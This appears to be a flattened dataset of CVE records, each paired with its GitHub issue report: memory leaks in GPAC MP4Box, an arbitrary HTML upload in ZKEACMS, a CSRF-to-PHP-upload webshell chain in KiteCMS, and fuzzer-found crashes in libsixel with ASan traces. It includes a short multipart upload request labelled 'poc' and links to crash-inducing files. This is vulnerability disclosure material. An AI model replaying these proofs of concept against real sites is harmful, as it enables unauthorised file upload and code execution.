cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2021-33363
2021-09-13T20:15:08.567
Memory leak in the infe_box_read function in MP4Box in GPAC 1.0.1 allows attackers to read memory via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/ec64c7b8966d7e4642d12debb888be5acf18efb9" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1786" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/ec64c7b8966d7e4642d12debb888be5acf18efb9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1786" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/gpac/gpac/issues/1786
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
[security]memory leak in MP4Box infe_box_read
https://api.github.com/repos/gpac/gpac/issues/1786/comments
0
2021-05-08T05:17:05Z
2023-09-22T06:13:34Z
https://github.com/gpac/gpac/issues/1786
880,299,345
1,786
2,475
CVE-2021-33365
2021-09-13T20:15:08.627
Memory leak in the gf_isom_get_root_od function in MP4Box in GPAC 1.0.1 allows attackers to read memory via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/984787de3d414a5f7d43d0b4584d9469dff2a5a5" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1784" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/984787de3d414a5f7d43d0b4584d9469dff2a5a5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1784" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/gpac/gpac/issues/1784
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
[security]memory leak in MP4Box gf_isom_get_root_od
https://api.github.com/repos/gpac/gpac/issues/1784/comments
0
2021-05-08T05:14:42Z
2023-09-22T06:08:59Z
https://github.com/gpac/gpac/issues/1784
880,296,904
1,784
2,476
CVE-2020-20670
2021-09-13T22:15:07.437
An arbitrary file upload vulnerability in /admin/media/upload of ZKEACMS V3.2.0 allows attackers to execute arbitrary code via a crafted HTML file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yilezhu/Czar.Cms/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yilezhu/Czar.Cms/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zkea:zkeacms:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "8BE5639E-3AAD-49E8-B7F9-855537544440", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/yilezhu/Czar.Cms/issues/6
[ "Exploit", "Third Party Advisory" ]
github.com
[ "yilezhu", "Czar.Cms" ]
Can upload Html Cause fishing attacks , JavaScript Code execution ![图片](https://user-images.githubusercontent.com/42528382/66637068-f098fc80-ec44-11e9-93f9-d389a08425b8.png) url :http://demo.zkea.net/admin/media/upload poc : -----------------------------189153225812082 Content-Disposition: form-data; name="file"; filename="test.html" Content-Type: application/octet-stream hello world! -----------------------------189153225812082 Content-Disposition: form-data; name="parentId" # -----------------------------189153225812082 Content-Disposition: form-data; name="size" 14 -----------------------------189153225812082-- ![图片](https://user-images.githubusercontent.com/42528382/66637255-41a8f080-ec45-11e9-9627-f69e45587fe2.png)
Arbitrary file upload vulnerability exists in the background
https://api.github.com/repos/yilezhu/Czar.Cms/issues/6/comments
0
2019-10-11T08:36:25Z
2019-10-11T08:36:25Z
https://github.com/yilezhu/Czar.Cms/issues/6
505,716,018
6
2,477
CVE-2020-20671
2021-09-13T22:15:10.077
A cross-site request forgery (CSRF) in KiteCMS V1.1 allows attackers to arbitrarily add an administrator account.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Kitesky/KiteCMS/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Kitesky/KiteCMS/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kitesky:kitecms:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "206854A6-CDE7-4607-B768-79570E16AE42", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/Kitesky/KiteCMS/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Kitesky", "KiteCMS" ]
SCRF : add administrator user Edit Upload options Upload php file getshell CSRF POC: ![图片](https://user-images.githubusercontent.com/42528382/66693655-af086000-ecdd-11e9-9046-ee1fd33fb884.png) Edit Upload options ![图片](https://user-images.githubusercontent.com/42528382/66693880-4ec6ed80-ece0-11e9-9797-ccf5b96ac4df.png) Upload php file getshell ![图片](https://user-images.githubusercontent.com/42528382/66693871-3951c380-ece0-11e9-9782-788409a02fd5.png) ![图片](https://user-images.githubusercontent.com/42528382/66693968-63f04c00-ece1-11e9-8f59-15b3bb4c2505.png) ![图片](https://user-images.githubusercontent.com/42528382/66693970-6f437780-ece1-11e9-945f-2b7c45f0683d.png)
There is CSRF and Arbitrary file upload vulnerability getshell
https://api.github.com/repos/kitesky/KiteCMS/issues/3/comments
0
2019-10-12T03:14:35Z
2019-10-12T03:14:35Z
https://github.com/kitesky/KiteCMS/issues/3
506,123,131
3
2,478
CVE-2020-21049
2021-09-14T16:15:08.773
An invalid read in the stb_image.h component of libsixel prior to v1.8.5 allows attackers to cause a denial of service (DOS) via a crafted PSD file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://bitbucket.org/netbsd/pkgsrc/commits/970a81d31ec7498e04d09b6b7771cef35f63cd28" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/blob/master/ChangeLog" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/commit/0b1e0b3f7b44233f84e5c9f512f8c90d6bbbe33d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/74" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/releases/tag/v1.8.5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://bitbucket.org/netbsd/pkgsrc/commits/970a81d31ec7498e04d09b6b7771cef35f63cd28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/blob/master/ChangeLog" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/commit/0b1e0b3f7b44233f84e5c9f512f8c90d6bbbe33d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/74" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/releases/tag/v1.8.5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:*:*:*:*:*:*:*:*", "matchCriteriaId": "8C9591E2-D3E9-40F7-82E8-EAA2FB78FD4D", "versionEndExcluding": "1.8.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/saitoha/libsixel/issues/74
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
Our fuzzer detected several crashes when converting PSD file against 2df6437 (compiled with Address Sanitizer). The command to trigger that is `img2sixel $POC -o /tmp/test.six` where $POC is: https://github.com/ntu-sec/pocs/blob/master/libsixel-2df6437/crashes/read_stb_image.h%3A5669_1.psd gdb output: ``` Reading symbols from /home/hongxu/FOT/libsixel-fuzz/install/bin/img2sixel...done. Starting program: /home/hongxu/FOT/libsixel-fuzz/install/bin/img2sixel read_stb_image.h:5669_1.psd -o /dev/null [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7a75bbc in stbi__psd_decode_rle (p=<optimized out>, pixelCount=0x1e000096, s=<optimized out>) at ./stb_image.h:5669 5669 len = stbi__get8(s); #0 0x00007ffff7a75bbc in stbi__psd_decode_rle (p=<optimized out>, pixelCount=0x1e000096, s=<optimized out>) at ./stb_image.h:5669 #1 stbi__psd_load (s=0x7fffffffb990, x=<optimized out>, y=<optimized out>, comp=0x7fffffffbab0, req_comp=0x3, ri=<optimized out>, bpc=<optimized out>) at ./stb_image.h:5809 #2 stbi__load_main (s=<optimized out>, x=<optimized out>, y=<optimized out>, comp=0x7fffffffbab0, req_comp=0x3, ri=0x7fffffffb200, bpc=<optimized out>) at ./stb_image.h:992 #3 0x00007ffff7a29fa9 in stbi__load_and_postprocess_8bit (s=0x7fffffffb990, x=0x607000000038, y=0x60700000003c, comp=0x7fffffffbab0, req_comp=0x3) at ./stb_image.h:1090 #4 0x00007ffff7a4eb05 in load_with_builtin (pchunk=<optimized out>, fstatic=0x0, fuse_palette=0x1, loop_control=0x0, context=<optimized out>, reqcolors=<optimized out>, bgcolor=<optimized out>, fn_load=<optimized out>) at loader.c:882 #5 sixel_helper_load_image_file (filename=0x7fffffffb830 " ", fstatic=<optimized out>, fuse_palette=<optimized out>, reqcolors=<optimized out>, bgcolor=<optimized out>, loop_control=<optimized out>, fn_load=<optimized out>, finsecure=<optimized out>, cancel_flag=<optimized out>, context=<optimized out>, allocator=<optimized out>) at loader.c:1352 #6 0x00007ffff7b5be07 in sixel_encoder_encode (encoder=0x610000000040, filename=0x7fffffffc9e3 "read_stb_image.h:5669_1.psd") at encoder.c:1737 #7 0x0000000000515390 in main (argc=0x4, argv=0x7fffffffc478) at img2sixel.c:457 ```
Address Sanitizer: invalid read at stb_image.h:5669
https://api.github.com/repos/saitoha/libsixel/issues/74/comments
3
2018-07-28T12:00:04Z
2020-01-03T01:34:42Z
https://github.com/saitoha/libsixel/issues/74
345,443,147
74
2,480
CVE-2020-21050
2021-09-14T16:15:08.987
Libsixel prior to v1.8.3 contains a stack buffer overflow in the function gif_process_raster at fromgif.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://bitbucket.org/netbsd/pkgsrc/commits/a27113e21179cbfbfae0c35f6a9edd6aa498faae" }, { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/121.html" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/blob/master/ChangeLog" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/commit/7808a06b88c11dbc502318cdd51fa374f8cd47ee" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/75" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/releases/tag/v1.8.5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://bitbucket.org/netbsd/pkgsrc/commits/a27113e21179cbfbfae0c35f6a9edd6aa498faae" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/121.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/blob/master/ChangeLog" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/commit/7808a06b88c11dbc502318cdd51fa374f8cd47ee" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/issues/75" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/saitoha/libsixel/releases/tag/v1.8.5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libsixel_project:libsixel:*:*:*:*:*:*:*:*", "matchCriteriaId": "3A5CB650-56E4-4DF9-9310-080C174E1528", "versionEndExcluding": "1.8.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/saitoha/libsixel/issues/75
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "saitoha", "libsixel" ]
Our fuzzer detected several crashes when converting gif file against 2df6437 (compiled with Address Sanitizer). The command to trigger that is `img2sixel $POC -o /tmp/test.six` where $POC can be: https://github.com/ntu-sec/pocs/blob/master/libsixel-2df6437/crashes/so_fromgif.c%3A310_1.gif https://github.com/ntu-sec/pocs/blob/master/libsixel-2df6437/crashes/so_fromgif.c%3A310_2.gif gdb output is like: ``` GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git Copyright (C) 2018 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from /home/hongxu/FOT/libsixel/install/bin/img2sixel...done. Starting program: /home/hongxu/FOT/libsixel/install/bin/img2sixel hbo_fromgif.c:310_1.gif -o /tmp/test.six [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". ================================================================= ==17533==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffa7d8 at pc 0x7ffff7b5f160 bp 0x7fffffff5950 sp 0x7fffffff5948 WRITE of size 2 at 0x7fffffffa7d8 thread T0 #0 0x7ffff7b5f15f in gif_process_raster /home/hongxu/FOT/libsixel/src/fromgif.c:310:31 #1 0x7ffff7b5c303 in gif_load_next /home/hongxu/FOT/libsixel/src/fromgif.c:462:22 #2 0x7ffff7b5a25e in load_gif /home/hongxu/FOT/libsixel/src/fromgif.c:599:22 #3 0x7ffff7b11198 in load_with_builtin /home/hongxu/FOT/libsixel/src/loader.c:858:18 #4 0x7ffff7b10116 in sixel_helper_load_image_file /home/hongxu/FOT/libsixel/src/loader.c:1352:18 #5 0x7ffff7b69d98 in sixel_encoder_encode /home/hongxu/FOT/libsixel/src/encoder.c:1737:14 #6 0x515787 in main /home/hongxu/FOT/libsixel/converters/img2sixel.c:457:22 #7 0x7ffff61a6b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #8 0x41a239 in _start (/home/hongxu/FOT/libsixel/install/bin/img2sixel+0x41a239) Address 0x7fffffffa7d8 is located in stack of thread T0 at offset 18296 in frame #0 0x7ffff7b5999f in load_gif /home/hongxu/FOT/libsixel/src/fromgif.c:555 This frame has 4 object(s): [32, 208) 's' (line 556) [272, 18296) 'g' (line 557) <== Memory access at offset 18296 overflows this variable [18560, 18568) 'frame' (line 559) [18592, 18600) 'fnp' (line 560) HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hongxu/FOT/libsixel/src/fromgif.c:310:31 in gif_process_raster Shadow bytes around the buggy address: 0x10007fff74a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff74b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff74c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff74d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff74e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10007fff74f0: 00 00 00 00 00 00 00 00 00 00 00[f2]f2 f2 f2 f2 0x10007fff7500: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 0x10007fff7510: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 f2 f2 f2 0x10007fff7520: 00 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==17533==ABORTING Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 51 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff61c5801 in __GI_abort () at abort.c:79 #2 0x000000000050376b in __sanitizer::Abort() () #3 0x0000000000500a98 in __sanitizer::Die() () #4 0x00000000004e2d1d in __asan::ReportGenericError(unsigned long, unsigned long, unsigned long, unsigned long, bool, unsigned long, unsigned int, bool) () #5 0x00000000004e374b in __asan_report_store2 () #6 0x00007ffff7b5f160 in gif_process_raster (s=0x7fffffff6080, g=0x7fffffff6170) at fromgif.c:310 #7 0x00007ffff7b5c304 in gif_load_next (s=0x7fffffff6080, g=0x7fffffff6170, bgcolor=0x0) at fromgif.c:462 #8 0x00007ffff7b5a25f in load_gif (buffer=0x62d000000400 "GIF89a\f", size=0xca, bgcolor=0x0, reqcolors=0x100, fuse_palette=0x1, fstatic=0x0, loop_control=0x0, fn_load=0x7ffff7b6a090 <load_image_callback>, context=0x610000000040, allocator=0x604000000190) at fromgif.c:599 #9 0x00007ffff7b11199 in load_with_builtin (pchunk=0x603000000e20, fstatic=0x0, fuse_palette=0x1, reqcolors=0x100, bgcolor=0x0, loop_control=0x0, fn_load=0x7ffff7b6a090 <load_image_callback>, context=0x610000000040) at loader.c:858 #10 0x00007ffff7b10117 in sixel_helper_load_image_file (filename=0x7fffffffc9ed "hbo_fromgif.c:310_1.gif", fstatic=0x0, fuse_palette=0x1, reqcolors=0x100, bgcolor=0x0, loop_control=0x0, fn_load=0x7ffff7b6a090 <load_image_callback>, finsecure=0x0, cancel_flag=0x13b61c0 <signaled>, context=0x610000000040, allocator=0x604000000190) at loader.c:1352 #11 0x00007ffff7b69d99 in sixel_encoder_encode (encoder=0x610000000040, filename=0x7fffffffc9ed "hbo_fromgif.c:310_1.gif") at encoder.c:1737 #12 0x0000000000515788 in main (argc=0x4, argv=0x7fffffffc488) at img2sixel.c:457 ```
AddressSanitizer: stack-buffer-overflow at fromgif.c:310
https://api.github.com/repos/saitoha/libsixel/issues/75/comments
2
2018-07-28T12:04:34Z
